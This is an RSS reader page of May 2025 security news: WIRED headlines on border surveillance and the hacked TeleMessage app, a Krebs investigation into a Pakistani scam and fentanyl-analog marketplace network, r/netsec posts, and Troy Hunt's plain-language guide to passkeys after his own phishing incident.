FreshRSS

🔒
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
☐ ☆ ✇ WIRED

US Customs and Border Protection Plans to Photograph Everyone Exiting the US by Car

By: Caroline Haskins — May 9th 2025 at 17:12
A CBP spokesperson tells WIRED that the agency plans to expand its program for real-time face recognition at the border, potentially aiding Trump administration efforts to track people who self-deport.
☐ ☆ ✇ WIRED

US Customs and Border Protection Quietly Revokes Protections for Pregnant Women and Infants

By: Dhruv Mehrotra — May 8th 2025 at 22:00
CBP’s acting commissioner has rescinded four Biden-era policies that aimed to protect vulnerable people in the agency’s custody, including mothers, infants, and the elderly.
☐ ☆ ✇ Security – Cisco Blog

AI Agent for Color Red

By: Dr. Giannis Tziakouris — May 8th 2025 at 12:00
AI can automate the analysis, generation, testing, and reporting of exploits. It's particularly relevant in penetration testing and ethical hacking scenarios.
☐ ☆ ✇ Krebs on Security

Pakistani Firm Shipped Fentanyl Analogs, Scams to US

By: BrianKrebs — May 7th 2025 at 22:22

A Texas firm recently charged with conspiring to distribute synthetic opioids in the United States is at the center of a vast network of companies in the U.S. and Pakistan whose employees are accused of using online ads to scam westerners seeking help with trademarks, book writing, mobile app development and logo designs, a new investigation reveals.

In an indictment (PDF) unsealed last month, the U.S. Department of Justice said Dallas-based eWorldTrade “operated an online business-to-business marketplace that facilitated the distribution of synthetic opioids such as isotonitazene and carfentanyl, both significantly more potent than fentanyl.”

Launched in 2017, eWorldTrade[.]com now features a seizure notice from the DOJ. eWorldTrade operated as a wholesale seller of consumer goods, including clothes, machinery, chemicals, automobiles and appliances. The DOJ’s indictment includes no additional details about eWorldTrade’s business, origins or other activity, and at first glance the website might appear to be a legitimate e-commerce platform that also just happened to sell some restricted chemicals.

A screenshot of the eWorldTrade homepage on March 25, 2025. Image: archive.org.

However, an investigation into the company’s founders reveals they are connected to a sprawling network of websites that have a history of extortionate scams involving trademark registration, book publishing, exam preparation, and the design of logos, mobile applications and websites.

Records from the U.S. Patent and Trademark Office (USPTO) show the eWorldTrade mark is owned by an Azneem Bilwani in Karachi (this name also is in the registration records for the now-seized eWorldTrade domain). Mr. Bilwani is perhaps better known as the director of the Pakistan-based IT provider Abtach Ltd., which has been singled out by the USPTO and Google for operating trademark registration scams (the main offices for eWorldtrade and Abtach share the same address in Pakistan).

In November 2021, the USPTO accused Abtach of perpetrating “an egregious scheme to deceive and defraud applicants for federal trademark registrations by improperly altering official USPTO correspondence, overcharging application filing fees, misappropriating the USPTO’s trademarks, and impersonating the USPTO.”

Abtach offered trademark registration at suspiciously low prices compared to legitimate costs of over USD $1,500, and claimed they could register a trademark in 24 hours. Abtach reportedly rebranded to Intersys Limited after the USPTO banned Abtach from filing any more trademark applications.

In a note published to its LinkedIn profile, Intersys Ltd. asserted last year that certain scam firms in Karachi were impersonating the company.

FROM AXACT TO ABTACH

Many of Abtach’s employees are former associates of a similar company in Pakistan called Axact that was targeted by Pakistani authorities in a 2015 fraud investigation. Axact came under law enforcement scrutiny after The New York Times ran a front-page story about the company’s most lucrative scam business: Hundreds of sites peddling fake college degrees and diplomas.

People who purchased fake certifications were subsequently blackmailed by Axact employees posing as government officials, who would demand additional payments under threats of prosecution or imprisonment for having bought fraudulent “unauthorized” academic degrees. This practice created a continuous cycle of extortion, internally referred to as “upselling.”

“Axact took money from at least 215,000 people in 197 countries — one-third of them from the United States,” The Times reported. “Sales agents wielded threats and false promises and impersonated government officials, earning the company at least $89 million in its final year of operation.”

Dozens of top Axact employees were arrested, jailed, held for months, tried and sentenced to seven years for various fraud violations. But a 2019 research brief on Axact’s diploma mills found none of those convicted had started their prison sentence, and that several had fled Pakistan and never returned.

“In October 2016, a Pakistan district judge acquitted 24 Axact officials at trial due to ‘not enough evidence’ and then later admitted he had accepted a bribe (of $35,209) from Axact,” reads a history (PDF) published by the American Association of Collegiate Registrars and Admissions Officers.

In 2021, Pakistan’s Federal Investigation Agency (FIA) charged Bilwani and nearly four dozen others — many of them Abtach employees — with running an elaborate trademark scam. The authorities called it “the biggest money laundering case in the history of Pakistan,” and named a number of businesses based in Texas that allegedly helped move the proceeds of cybercrime.

A page from the March 2021 FIA report alleging that Digitonics Labs and Abtach employees conspired to extort and defraud consumers.

The FIA said the defendants operated a large number of websites offering low-cost trademark services to customers, before then “ignoring them after getting the funds and later demanding more funds from clients/victims in the name of up-sale (extortion).” The Pakistani law enforcement agency said that about 75 percent of customers received fake or fabricated trademarks as a result of the scams.

The FIA found Abtach operates in conjunction with a Karachi firm called Digitonics Labs, which earned a monthly revenue of around $2.5 million through the “extortion of international clients in the name of up-selling, the sale of fake/fabricated USPTO certificates, and the maintaining of phishing websites.”

According the Pakistani authorities, the accused also ran countless scams involving ebook publication and logo creation, wherein customers are subjected to advance-fee fraud and extortion — with the scammers demanding more money for supposed “copyright release” and threatening to release the trademark.

Also charged by the FIA was Junaid Mansoor, the owner of Digitonics Labs in Karachi. Mansoor’s U.K.-registered company Maple Solutions Direct Limited has run at least 700 ads for logo design websites since 2015, the Google Ads Transparency page reports. The company has approximately 88 ads running on Google as of today. 

Junaid Mansoor. Source: youtube/@Olevels․com School.

Mr. Mansoor is actively involved with and promoting a Quran study business called quranmasteronline[.]com, which was founded by Junaid’s brother Qasim Mansoor (Qasim is also named in the FIA criminal investigation). The Google ads promoting quranmasteronline[.]com were paid for by the same account advertising a number of scam websites selling logo and web design services. 

Junaid Mansoor did not respond to requests for comment. An address in Teaneck, New Jersey where Mr. Mansoor previously lived is listed as an official address of exporthub[.]com, a Pakistan-based e-commerce website that appears remarkably similar to eWorldTrade (Exporthub says its offices are in Texas). Interestingly, a search in Google for this domain shows ExportHub currently features multiple listings for fentanyl citrate from suppliers in China and elsewhere.

The CEO of Digitonics Labs is Muhammad Burhan Mirza, a former Axact official who was arrested by the FIA as part of its money laundering and trademark fraud investigation in 2021. In 2023, prosecutors in Pakistan charged Mirza, Mansoor and 14 other Digitonics employees with fraud, impersonating government officials, phishing, cheating and extortion. Mirza’s LinkedIn profile says he currently runs an educational technology/life coach enterprise called TheCoach360, which purports to help young kids “achieve financial independence.”

Reached via LinkedIn, Mr. Mirza denied having anything to do with eWorldTrade or any of its sister companies in Texas.

“Moreover, I have no knowledge as to the companies you have mentioned,” said Mr. Mirza, who did not respond to follow-up questions.

The current disposition of the FIA’s fraud case against the defendants is unclear. The investigation was marred early on by allegations of corruption and bribery. In 2021, Pakistani authorities alleged Bilwani paid a six-figure bribe to FIA investigators. Meanwhile, attorneys for Mr. Bilwani have argued that although their client did pay a bribe, the payment was solicited by government officials. Mr. Bilwani did not respond to requests for comment.

THE TEXAS NEXUS

KrebsOnSecurity has learned that the people and entities at the center of the FIA investigations have built a significant presence in the United States, with a strong concentration in Texas. The Texas businesses promote websites that sell logo and web design, ghostwriting, and academic cheating services. Many of these entities have recently been sued for fraud and breach of contract by angry former customers, who claimed the companies relentlessly upsold them while failing to produce the work as promised.

For example, the FIA complaints named Retrocube LLC and 360 Digital Marketing LLC, two entities that share a street address with eWorldTrade: 1910 Pacific Avenue, Suite 8025, Dallas, Texas. Also incorporated at that Pacific Avenue address is abtach[.]ae, a web design and marketing firm based in Dubai; and intersyslimited[.]com, the new name of Abtach after they were banned by the USPTO. Other businesses registered at this address market services for logo design, mobile app development, and ghostwriting.

A list published in 2021 by Pakistan’s FIA of different front companies allegedly involved in scamming people who are looking for help with trademarks, ghostwriting, logos and web design.

360 Digital Marketing’s website 360digimarketing[.]com is owned by an Abtach front company called Abtech LTD. Meanwhile, business records show 360 Digi Marketing LTD is a U.K. company whose officers include former Abtach director Bilwani; Muhammad Saad Iqbal, formerly Abtach, now CEO of Intersys Ltd; Niaz Ahmed, a former Abtach associate; and Muhammad Salman Yousuf, formerly a vice president at Axact, Abtach, and Digitonics Labs.

Google’s Ads Transparency Center finds 360 Digital Marketing LLC ran at least 500 ads promoting various websites selling ghostwriting services . Another entity tied to Junaid Mansoor — a company called Octa Group Technologies AU — has run approximately 300 Google ads for book publishing services, promoting confusingly named websites like amazonlistinghub[.]com and barnesnoblepublishing[.]co.

360 Digital Marketing LLC ran approximately 500 ads for scam ghostwriting sites.

Rameez Moiz is a Texas resident and former Abtach product manager who has represented 360 Digital Marketing LLC and RetroCube. Moiz told KrebsOnSecurity he stopped working for 360 Digital Marketing in the summer of 2023. Mr. Moiz did not respond to follow-up questions, but an Upwork profile for him states that as of April 2025 he is employed by Dallas-based Vertical Minds LLC.

In April 2025, California resident Melinda Will sued the Texas firm Majestic Ghostwriting — which is doing business as ghostwritingsquad[.]com —  alleging they scammed her out of $100,000 after she hired them to help write her book. Google’s ad transparency page shows Moiz’s employer Vertical Minds LLC paid to run approximately 55 ads for ghostwritingsquad[.]com and related sites.

Google’s ad transparency listing for ghostwriting ads paid for by Vertical Minds LLC.

VICTIMS SPEAK OUT

Ms. Will’s lawsuit is just one of more than two dozen complaints over the past four years wherein plaintiffs sued one of this group’s web design, wiki editing or ghostwriting services. In 2021, a New Jersey man sued Octagroup Technologies, alleging they ripped him off when he paid a total of more than $26,000 for the design and marketing of a web-based mapping service.

The plaintiff in that case did not respond to requests for comment, but his complaint alleges Octagroup and a myriad other companies it contracted with produced minimal work product despite subjecting him to relentless upselling. That case was decided in favor of the plaintiff because the defendants never contested the matter in court.

In 2023, 360 Digital Marketing LLC and Retrocube LLC were sued by a woman who said they scammed her out of $40,000 over a book she wanted help writing. That lawsuit helpfully showed an image of the office front door at 1910 Pacific Ave Suite 8025, which featured the logos of 360 Digital Marketing, Retrocube, and eWorldTrade.

The front door at 1910 Pacific Avenue, Suite 8025, Dallas, Texas.

The lawsuit was filed pro se by Leigh Riley, a 64-year-old career IT professional who paid 360 Digital Marketing to have a company called Talented Ghostwriter co-author and promote a series of books she’d outlined on spirituality and healing.

“The main reason I hired them was because I didn’t understand what I call the formula for writing a book, and I know there’s a lot of marketing that goes into publishing,” Riley explained in an interview. “I know nothing about that stuff, and these guys were convincing that they could handle all aspects of it. Until I discovered they couldn’t write a damn sentence in English properly.”

Riley’s well-documented lawsuit (not linked here because it features a great deal of personal information) includes screenshots of conversations with the ghostwriting team, which was constantly assigning her to new writers and editors, and ghosting her on scheduled conference calls about progress on the project. Riley said she ended up writing most of the book herself because the work they produced was unusable.

“Finally after months of promising the books were printed and on their way, they show up at my doorstep with the wrong title on the book,” Riley said. When she demanded her money back, she said the people helping her with the website to promote the book locked her out of the site.

A conversation snippet from Leigh Riley’s lawsuit against Talented Ghostwriter, aka 360 Digital Marketing LLC. “Other companies once they have you money they don’t even respond or do anything,” the ghostwriting team manager explained.

Riley decided to sue, naming 360 Digital Marketing LLC and Retrocube LLC, among others.  The companies offered to settle the matter for $20,000, which she accepted. “I didn’t have money to hire a lawyer, and I figured it was time to cut my losses,” she said.

Riley said she could have saved herself a great deal of headache by doing some basic research on Talented Ghostwriter, whose website claims the company is based in Los Angeles. According to the California Secretary of State, however, there is no registered entity by that name. Rather, the address claimed by talentedghostwriter[.]com is a vacant office building with a “space available” sign in the window.

California resident Walter Horsting discovered something similar when he sued 360 Digital Marketing in small claims court last year, after hiring a company called Vox Ghostwriting to help write, edit and promote a spy novel he’d been working on. Horsting said he paid Vox $3,300 to ghostwrite a 280-page book, and was upsold an Amazon marketing and publishing package for $7,500.

In an interview, Horsting said the prose that Vox Ghostwriting produced was “juvenile at best,” forcing him to rewrite and edit the work himself, and to partner with a graphical artist to produce illustrations. Horsting said that when it came time to begin marketing the novel, Vox Ghostwriting tried to further upsell him on marketing packages, while dodging scheduled meetings with no follow-up.

“They have a money back guarantee, and when they wouldn’t refund my money I said I’m taking you to court,” Horsting recounted. “I tried to serve them in Los Angeles but found no such office exists. I talked to a salon next door and they said someone else had recently shown up desperately looking for where the ghostwriting company went, and it appears there are a trail of corpses on this. I finally tracked down where they are in Texas.”

It was the same office that Ms. Riley served her lawsuit against. Horsting said he has a court hearing scheduled later this month, but he’s under no illusions that winning the case means he’ll be able to collect.

“At this point, I’m doing it out of pride more than actually expecting anything to come to good fortune for me,” he said.

The following mind map was helpful in piecing together key events, individuals and connections mentioned above. It’s important to note that this graphic only scratches the surface of the operations tied to this group. For example, in Case 2 we can see mention of academic cheating services, wherein people can be hired to take online proctored exams on one’s behalf. Those who hire these services soon find themselves subject to impersonation and blackmail attempts for larger and larger sums of money, with the threat of publicly exposing their unethical academic cheating activity.

A “mind map” illustrating the connections between and among entities referenced in this story. Click to enlarge.

GOOGLE RESPONDS

KrebsOnSecurity reviewed the Google Ad Transparency links for nearly 500 different websites tied to this network of ghostwriting, logo, app and web development businesses. Those website names were then fed into spyfu.com, a competitive intelligence company that tracks the reach and performance of advertising keywords. Spyfu estimates that between April 2023 and April 2025, those websites spent more than $10 million on Google ads.

Reached for comment, Google said in a written statement that it is constantly policing its ad network for bad actors, pointing to an ads safety report (PDF) showing Google blocked or removed 5.1 billion bad ads last year — including more than 500 million ads related to trademarks.

“Our policy against Enabling Dishonest Behavior prohibits products or services that help users mislead others, including ads for paper-writing or exam-taking services,” the statement reads. “When we identify ads or advertisers that violate our policies, we take action, including by suspending advertiser accounts, disapproving ads, and restricting ads to specific domains when appropriate.”

Google did not respond to specific questions about the advertising entities mentioned in this story, saying only that “we are actively investigating this matter and addressing any policy violations, including suspending advertiser accounts when appropriate.”

From reviewing the ad accounts that have been promoting these scam websites, it appears Google has very recently acted to remove a large number of the offending ads. Prior to my notifying Google about the extent of this ad network on April 28, the Google Ad Transparency network listed over 500 ads for 360 Digital Marketing; as of this publication, that number had dwindled to 10.

On April 30, Google announced that starting this month its ads transparency page will display the payment profile name as the payer name for verified advertisers, if that name differs from their verified advertiser name. Searchengineland.com writes the changes are aimed at increasing accountability in digital advertising.

This spreadsheet lists the domain names, advertiser names, and Google Ad Transparency links for more than 350 entities offering ghostwriting, publishing, web design and academic cheating services.

KrebsOnSecurity would like to thank the anonymous security researcher NatInfoSec for their assistance in this investigation.

For further reading on Abtach and its myriad companies in all of the above-mentioned verticals (ghostwriting, logo design, etc.), see this Wikiwand entry.

☐ ☆ ✇ WIRED

Customs and Border Protection Confirms Its Use of Hacked Signal Clone TeleMessage

By: Lily Hay Newman — May 7th 2025 at 21:03
CBP says it has “disabled” its use of TeleMessage following reports that the app, which has not cleared the US government’s risk assessment program, was hacked.
☐ ☆ ✇ WIRED

The Trump Administration Sure Is Having Trouble Keeping Its Comms Private

By: Zoë Schiffer, Lily Hay Newman — May 7th 2025 at 18:08
In the wake of SignalGate, a knockoff version of Signal used by a high-ranking member of the Trump administration was hacked. Today on Uncanny Valley, we discuss the platforms used for government communications.
☐ ☆ ✇ /r/netsec - Information Security News & Discussion

Known Exploited Vulnerabilities Intel

By: /u/ethicalhack3r — May 7th 2025 at 10:40

The site displays known exploited vulnerabilities (KEVs) that have been cataloged from over 50 public sources, including CISA, and (once we get some hits) my own private sensors.

Each entry links to a CVE identifier, where the CVE details are enriched with EPSS scores, online mentions, scanner inclusion, exploitation, and other metadata.

The goal is to be an early warning system, even before being published by CISA.

Includes open public JSON API, CSV download and RSS feed.

submitted by /u/ethicalhack3r
[link] [comments]
☐ ☆ ✇ /r/netsec - Information Security News & Discussion

We Got Tired of Labs NOT preparing us for Real Targets… So We Built This (Seeking Beta Feedback!)

By: /u/RogueSMG — May 7th 2025 at 09:14

Quick intro: I've been kicking around in infosec for about 5 years now, starting with Pentesting and later focusing mainly on bug bounties full-time for the last 3 or so (some might know me as RogueSMG from Twitter, or YouTube back in the day). My co-founder Kuldeep Pandya has been deep in it too (you might have seen his stuff at kuldeep.io).

TL;DR: Built "Barracks Social," a FREE, realistic social media sim WarZone to bridge the lab-to-real-world gap (evolving, no hints, reporting focus). Seeking honest beta feedback! Link: https://beta.barracks.army

Like many of you, we constantly felt that frustrating jump from standard labs/CTFs to the complexity and chaos of Real-World targets. We've had solved numerous Labs and played a few CTFs - but still couldn't feel "confident enough" to pick a Target and just Start Hacking. It felt like the available practice didn't quite build the right instincts.

To try and help bridge that gap, we started Barracks and built our first WarZone concept: "Barracks Social".

It's a simulated Social Networking site seeded with vulnerabilities inspired by Real-World reports including vulns we've personally found as well as from the community writeups. We designed it to be different:

  • No Hand-Holding: Explore, Recon, find vulns organically. No hints.
  • It Evolves: Simulates patches/updates based on feedback, so the attack surface changes.
  • Reporting Focus: Designed to practice writing clear, detailed reports.

We just launched the early Beta Platform with Barracks Social, and it's completely FREE to use, now and permanently. We're committed to keeping foundational training accessible and plan to release more free WarZones regularly too.

I'm NOT selling anything with this Post; We're just genuinely looking for feedback from students, learners, and fellow practitioners on this first free WarZone. Does this realistic approach help build practical skills? What works? What's frustrating?

It's definitely Beta (built by our small team!), expect rough edges.

If you want to try a different practice challenge and share your honest thoughts, access the free beta here:

Link: https://beta.barracks.army
For more details -> https://barracks.army

Happy to answer any questions in the comments! What are your biggest hurdles moving from labs to live targets?

submitted by /u/RogueSMG
[link] [comments]
☐ ☆ ✇ WIRED

The Signal Clone Mike Waltz Was Caught Using Has Direct Access to User Chats

By: Lily Hay Newman — May 6th 2025 at 20:24
A new analysis of TM Signal’s source code appears to show that the app sends users’ message logs in plaintext. At least one top Trump administration official used the app.
☐ ☆ ✇ WIRED

Tulsi Gabbard Reused the Same Weak Password on Multiple Accounts for Years

By: Tim Marchman — May 6th 2025 at 19:27
Now the US director of national intelligence, Gabbard failed to follow basic cybersecurity practices on several of her personal accounts, leaked records reviewed by WIRED reveal.
☐ ☆ ✇ WIRED

US Border Agents Are Asking for Help Taking Photos of Everyone Entering the Country by Car

By: Caroline Haskins — May 6th 2025 at 09:00
Customs and Border Protection has called for tech companies to pitch real-time face recognition technology that can capture everyone in a vehicle—not just those in the front seats.
☐ ☆ ✇ /r/netsec - Information Security News & Discussion

Snowflake’s AI Bypasses Access Controls

By: /u/Affectionate-Win6936 — May 6th 2025 at 05:25

Snowflake’s Cortex AI can return data that the requesting user shouldn’t have access to — even when proper Row Access Policies and RBAC are in place.

submitted by /u/Affectionate-Win6936
[link] [comments]
☐ ☆ ✇ WIRED

Signal Clone Used by Mike Waltz Pauses Service After Reports It Got Hacked

By: Lily Hay Newman — May 5th 2025 at 21:24
The communications app TeleMessage, which was spotted on former US national security adviser Mike Waltz's phone, has suspended “all services” as it investigates reports of at least one breach.
☐ ☆ ✇ Security – Cisco Blog

Automate Forensics to Eliminate Uncertainty

By: Rajat Gulati — May 5th 2025 at 12:00
Discover how Cisco XDR delivers automated forensics and AI-driven investigation—bringing speed, clarity, and confidence to SecOps teams.
☐ ☆ ✇ WIRED

Security Researchers Warn a Widely Used Open Source Tool Poses a 'Persistent' Risk to the US

By: Matt Burgess — May 5th 2025 at 10:00
The open source software easyjson is used by the US government and American companies. But its ties to Russia’s VK, whose CEO has been sanctioned, have researchers sounding the alarm.
☐ ☆ ✇ Troy Hunt

Passkeys for Normal People

By: Troy Hunt — May 5th 2025 at 08:12
Passkeys for Normal People

Let me start by very simply explaining the problem we're trying to solve with passkeys. Imagine you're logging on to a website like this:

Passkeys for Normal People

And, because you want to protect your account from being logged into by someone else who may obtain your username and password, you've turned on two-factor authentication (2FA). That means that even after entering the correct credentials in the screen above, you're now prompted to enter the six-digit code from your authenticator app:

Passkeys for Normal People

There are a few different authenticator apps out there, but what they all have in common is that they display a one-time password (henceforth referred to as an OTP) with a countdown timer next to it:

Passkeys for Normal People

By only being valid for a short period of time, if someone else obtains the OTP then they have a very short window in which it's valid. Besides, who can possibly obtain it from your authenticator app anyway?! Well... that's where the problem lies, and I demonstrated this just recently, not intentionally, but rather entirely by accident when I fell victim to a phishing attack. Here's how it worked:

Passkeys for Normal People

  1. I was socially engineered into visiting a phishing page that pretended to belong to Mailchimp who I use to send newsletters for this blog. The website address was mailchimp-sso.com, which was close enough to the real address (mailchimp.com) to be feasible. "SSO" is "single sign on", so also seemed feasible.
  2. When I saw the login screen (the one with the big "PHISH" stamp on it), and submitted my username and password to them, the phishing site then automatically used those credentials to begin the login process on Mailchimp.
  3. Mailchimp validated the credentials, and because I had 2FA turned on, then displayed the OTP request screen.
  4. The legitimate OTP screen from Mailchimp was then returned to the bad guys...
  5. ...who responded to my login request with their own page requesting the OTP.
  6. I entered the code into the form and submitted it to the phishing site.
  7. The bad guys then immediately sent that request to Mailchimp, thus successfully logging themselves in.

The problem with OTPs from authenticator apps (or sent via SMS) is that they're phishable in that it's possible for someone to trick you into handing one over. What we need instead is a "phishing-resistant" paradigm, and that's precisely what passkeys are. Let's look at how to set them up, how to use them on websites and in mobile apps, and talk about what some of their shortcomings are.

Passkeys for Log In on Mobile with WhatsApp

We'll start by setting one up for WhatsApp given I got a friendly prompt from them to do this recently:

Passkeys for Normal People

So, let's "Try it" and walk through the mechanics of what it means to setup a passkey. I'm using an iPhone, and this is the screen I'm first presented with:

Passkeys for Normal People

A passkey is simply a digital file you store on your device. It has various cryptographic protections in the way it is created and then used to login, but that goes beyond the scope of what I want to explain to the audience in this blog post. Let's touch briefly on the three items WhatsApp describes above:

  1. The passkey will be used to logon to the service
  2. It works in conjunction with how you already authenticate to your device
  3. It needs to be stored somewhere (remember, it's a digital file)

That last point can be very device-specific and very user-specific. Because I have an iPhone, WhatsApp is suggesting I save the passkey into my iCloud Keychain. If you have an Android, you're obviously going to see a different message that aligns to how Google syncs passkeys. Choosing one of these native options is your path of least resistance - a couple of clicks and you're done. However...

I have lots of other services I want to use passkeys on, and I want to authenticate to them both from my iPhone and my Windows PC. For example, I use LinkedIn across all my devices, so I don't want my passkey tied solely to my iPhone. (It's a bit clunky, but some services enable this by using the mobile device your passkey is on to scan a QR code displayed on a web page). And what if one day I switch from iPhone to Android? I'd like my passkeys to be more transferable, so I'm going to store them in my dedicated password manager, 1Password.

A quick side note: as you'll read in this post, passkeys do not necessarily replace passwords. Sometimes they can be used as a "single factor" (the only thing you use to login with), but they may also be used as a "second factor" with the first being your password. This is up to the service implementing them, and one of the criticisms of passkeys is that your experience with them will differ between websites.

We still need passwords, we still want them to be strong and unique, therefore we still need password managers. I've been using 1Password for 14 years now (full disclosure: they sponsor Have I Been Pwned, and often sponsor this blog too) and as well as storing passwords (and credit cards and passport info and secure notes and sharing it all with my family), they can also store passkeys. I have 1Password installed on my iPhone and set as the default app to autofill passwords and passkeys:

Passkeys for Normal People

Because of this, I'm given the option to store my WhatsApp passkey directly there:

Passkeys for Normal People

The obfuscated section is the last four digits of my phone number. Let's "Continue", and then 1Password pops up with a "Save" button:

Passkeys for Normal People

Once saved, WhatsApp displays the passkey that is now saved against my account:

Passkeys for Normal People

And because I saved it into 1Password that syncs across all my devices, I can jump over to the PC and see it there too.

Passkeys for Normal People

And that's it, I now have a passkey for WhatsApp which can be used to log in. I picked this example as a starting point given the massive breadth of the platform and the fact I was literally just prompted to create a passkey (the very day my Mailchimp account was phished, ironically). Only thing is, I genuinely can't see how to log out of WhatsApp so I can then test using the passkey to login. Let's go and create another with a different service and see how that experience differs.

Passkeys For Log In via PC with LinkedIn

Let's pick another example, and we'll set this one up on my PC. I'm going to pick a service that contains some important personal information, which would be damaging if it were taken over. In this case, the service has also previously suffered a data breach themselves: LinkedIn.

I already had two-step verification enabled on LinkedIn, but as evidenced in my own phishing experience, this isn't always enough. (Note: the terms "two-step", "two-factor" and "multi-factor" do have subtle differences, but for the sake of simplicity, I'll treat them as interchangeable terms in this post.)

Passkeys for Normal People

Onto passkeys, and you'll see similarities between LinkedIn's and WhatsApp's descriptions. An important difference, however, is LinkedIn's comment about not needing to remember complex passwords:

Passkeys for Normal People

Let's jump into it and create that passkey, but just before we do, keep in mind that it's up to each and every different service to decide how they implement the workflow for creating passkeys. Just like how different services have different rules for password strength criteria, the same applies to the mechanics of passkey creation. LinkedIn begins by requiring my password again:

Passkeys for Normal People

This is part of the verification process to ensure someone other than you (for example, someone who can sit down at your machine that's already logged into LinkedIn), can't add a new way of accessing your account. I'm then prompted for a 6-digit code:

Passkeys for Normal People

Which has already been sent to my email address, thus verifying I am indeed the legitimate account holder:

Passkeys for Normal People

As soon as I enter that code in the website, LinkedIn pushes the passkey to me, which 1Password then offers to save:

Passkeys for Normal People

Again, your experience will differ based on which device and preferred method of storing passkeys you're using. But what will always be the same for LinkedIn is that you can then see the successfully created passkey on the website:

Passkeys for Normal People

Now, let's see how it works by logging out of LinkedIn and then returning to the login page. Immediately, 1Password pops up and offers to sign me in with my passkey:

Passkeys for Normal People

That's a one-click sign-in, and clicking the purple button immediately grants me access to my account. Not only will 1Password not let me enter the passkey into a phishing site, due to the technical implementation of the keys, it would be completely unusable even if it was submitted to a nefarious party. Let me emphasise something really significant about this process:

Passkeys are one of the few security constructs that make your life easier, rather than harder.

However, there's a problem: I still have a password on the account, and I can still log in with it. What this means is that LinkedIn has decided (and, again, this is one of those website-specific decisions), that a passkey merely represents a parallel means of logging in. It doesn't replace the password, nor can it be used as a second factor. Even after generating the passkey, only two options are available for that second factor:

Passkeys for Normal People

The risk here is that you can still be tricked into entering your password into a phishing site, and per my Mailchimp example, your second factor (the OTP generated by your authenticator app) can then also be phished. This is not to say you shouldn't use a passkey on LinkedIn, but whilst you still have a password and phishable 2FA, you're still at risk of the same sort of attack that got me.

Passkeys for 2FA with Ubiquiti

Let's try one more example, and this time, it's one that implements passkeys as a genuine second factor: Ubiquiti.

Ubiquiti is my favourite manufacturer of networking equipment, and logging onto their system gives you an enormous amount of visibility into my home network. When originally setting up that account many years ago, I enabled 2FA with an OTP and, as you now understand, ran the risk of it being phished. But just the other day I noticed passkey support and a few minutes later, my Ubiquiti account in 1Password looked like this:

Passkeys for Normal People

I won't bother running through the setup process again because it's largely similar to WhatsApp and LinkedIn, but I will share just what it looks like to now login to that account, and it's awesome:

I intentionally left this running at real-time speed to show how fast the login process is with a password manager and passkey (I've blanked out some fields with personal info in them). That's about seven seconds from when I first interacted with the screen to when I was fully logged in with a strong password and second factor. Let me break that process down step by step:

  1. When I click on the "Email or Username" field, 1Password suggests the account to be logged in with.
  2. I click on the account I want to use and 1Password validates my identity with Face ID.
  3. 1Password automatically fills in my credentials and submits the form.
  4. Ubiquiti asks for my passkey, I click "Continue" and my iPhone uses Face ID again to ensure it's really me.
  5. The passkey is submitted to Ubiquiti and I'm successfully logged in. (As it was my first login via Chrome on my iPhone, Ubiquiti then asks if I want to trust the device, but that happens after I'm already successfully logged in.)

Now, remember "the LinkedIn problem" where you were still stuck with phishable 2FA? Not so with Ubiquiti, who allowed me to completely delete the authenticator app:

Passkeys for Normal People

But there's one more thing we can do here to strengthen everything up further, and that's to get rid of email authentication and replace it with something even stronger than a passkey: a U2F key.

Physical Universal 2 Factor Key for 2FA with Ubiquiti

Whilst passkeys themselves are considered non-phishable, what happens if the place you store that digital key gets compromised? Your iCloud Keychain, for example, or your 1Password account. If you configure and manage these services properly then the likelihood of that happening is extremely remote, but the possibility remains. Let's add something entirely different now, and that's a physical security key:

Passkeys for Normal People

This is a YubiKey and you can you can store your digital passkey on it. It needs to be purchased and as of today, that's about a US$60 investment for a single key. YubiKeys are called "Universal 2 Factor" or U2F keys and the one above (that's a 5C NFC) can either plug into a device with USB-C or be held next to a phone with NFC (that's "near field communication", a short-range wireless technology that requires devices to be a few centimetres apart). YubiKeys aren't the only makers of U2F keys, but their name has become synonymous with the technology.

Back to Ubiquiti, and when I attempt to remove email authentication, the following prompt stops me dead in my tracks:

Passkeys for Normal People

I don't want email authentication because that involves sending a code to my email address and, well, we all know what happens when we're relying on people to enter codes into login forms 🤔 So, let's now walk through the Ubiquiti process and add another passkey as a second factor:

Passkeys for Normal People

But this time, when Chrome pops up and offers to save it in 1Password, I'm going to choose the little USB icon at the top of the prompt instead:

Passkeys for Normal People

Windows then gives me a prompt to choose where I wish to save the passkey, which is where I choose the security key I've already inserted into my PC:

Passkeys for Normal People

Each time you begin interacting with a U2F key, it requires a little tap:

Passkeys for Normal People

And a moment later, my digital passkey has been saved to my physical U2F key:

Passkeys for Normal People

Just as you can save your passkey to Apple's iCloud Keychain or in 1Password and sync it across your devices, you can also save it to a physical key. And that's precisely what I've now done - saved one Ubiquiti passkey to 1Password and one to my YubiKey. Which means I can now go and remove email authentication, but it does carry a risk:

Passkeys for Normal People

This is a good point to reflect on the paradox that securing your digital life presents: as we seek stronger forms of authentication, we create different risks. Losing all your forms of non-phishable 2FA, for example, creates the risk of losing access to your account. But we also have mitigating controls: your digital passkey is managed totally independently of your physical one so the chances of losing both are extremely low. Plus, best practice is usually to have two U2F keys and enrol them both (I always take one with me when I travel, and leave another one at home). New levels of security, new risks, new mitigations.

Finding Sites That Support Passkeys

All that's great, but beyond my examples above, who actually supports passkeys?! A rapidly expanding number of services, many of which 1Password has documented in their excellent passkeys.directory website:

Passkeys for Normal People

Have a look through the list there, and you'll see many very familiar brands. You won't see Ubiquiti as of the time of writing, but I've gone through the "Suggest new listing" process to have them added and will be chatting further with the 1Password folks to see how we can more rapidly populate that list.

Do also take a look at the "Vote for passkeys support" tab and if you see a brand that really should be there, make your voice heard. Hey, here's a good one to start voting for:

Passkeys for Normal People

Summary

I've deliberately just focused on the mechanics of passkeys in this blog post, but let me take just a moment to highlight important separate but related concepts. Think of passkeys as one part of what we call "defence in depth", that is the application of multiple controls to help keep you safe online. For example, you should still treat emails containing links with a healthy suspicion and whenever in doubt, not click anything and independently navigate to the website in question via your browser. You should still have strong, unique passwords and use a password manager to store them. And you should probably also make sure you're fully awake and not jet lagged in bed before manually entering your credentials into a website your password manager didn't autofill for you 🙂

We're not at the very beginning of passkeys, and we're also not yet quite at the tipping point either... but it's within sight. Just last week, Microsoft announced that new accounts will be passwordless by default, with a preference to using passkeys. Whilst passkeys are by no means perfect, look at what they're replacing! Start using them now on your most essential services and push those that don't support them to genuinely take the security of their customers seriously.

☐ ☆ ✇ /r/netsec - Information Security News & Discussion

